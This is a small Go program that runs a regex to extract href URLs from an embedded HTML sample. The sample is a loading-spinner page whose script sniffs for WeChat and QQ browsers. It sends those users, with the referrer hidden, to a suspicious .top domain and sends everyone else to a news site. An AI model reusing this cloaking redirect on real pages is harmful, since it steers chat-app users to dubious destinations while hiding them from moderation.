package main
import (
"regexp"
"fmt"
)
func main() {
var re = regexp.MustCompile(`(?m)href\W+=\W+['|\"]([http|https]+://.+)['|\"]`)
var str = `<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>网页加载中...</title>
<style type="text/css">
.sk-three-bounce {
margin: 100px auto;
width: 80px;
text-align: center;
}
.sk-three-bounce .sk-child {
width: 20px;
height: 20px;
background-color: rgba(52, 214, 27, 0.76);
border-radius: 100%;
display: inline-block;
-webkit-animation: sk-three-bounce 1.4s ease-in-out 0s infinite both;
animation: sk-three-bounce 1.4s ease-in-out 0s infinite both;
}
.sk-three-bounce .sk-bounce1 {
-webkit-animation-delay: -0.32s;
animation-delay: -0.32s;
}
.sk-three-bounce .sk-bounce2 {
-webkit-animation-delay: -0.16s;
animation-delay: -0.16s;
}
@-webkit-keyframes sk-three-bounce {
0%, 80%, 100% {
-webkit-transform: scale(0);
transform: scale(0);
}
40% {
-webkit-transform: scale(1);
transform: scale(1);
}
}
@keyframes sk-three-bounce {
0%, 80%, 100% {
-webkit-transform: scale(0);
transform: scale(0);
}
40% {
-webkit-transform: scale(1);
transform: scale(1);
}
}
</style>
</head>
<body>
<div class="sk-three-bounce">
<div class="sk-child sk-bounce1"></div>
<div class="sk-child sk-bounce2"></div>
<div class="sk-child sk-bounce3"></div>
</div>
</body>
<script type="text/javascript">
document.title = '网页加载中...';
var ua = navigator.userAgent;
if (ua.indexOf('MicroMessenger') > 0 ||ua.indexOf('QQ')>0||ua.indexOf('qq')>0) {
var noreferrer = true;
setTimeout(skip,1000)
}
else {
top.location.href = 'https://xw.qq.com';
};
function skip() {
if (top != window || !document.body) {
top.location.href = 'http://zruhdc.ddccee.top/travel_hot_gonglve_59721879943236';
}
else {
var a = document.createElement('a');
a.href = 'http://zruhdc.ddccee.top/travel_hot_gonglve_59721879943236';
if (noreferrer)
a.rel = 'noreferrer';
a.click();
}
}
</script>
</html>`
for i, match := range re.FindAllString(str, -1) {
fmt.Println(match, "found at index", i)
}
}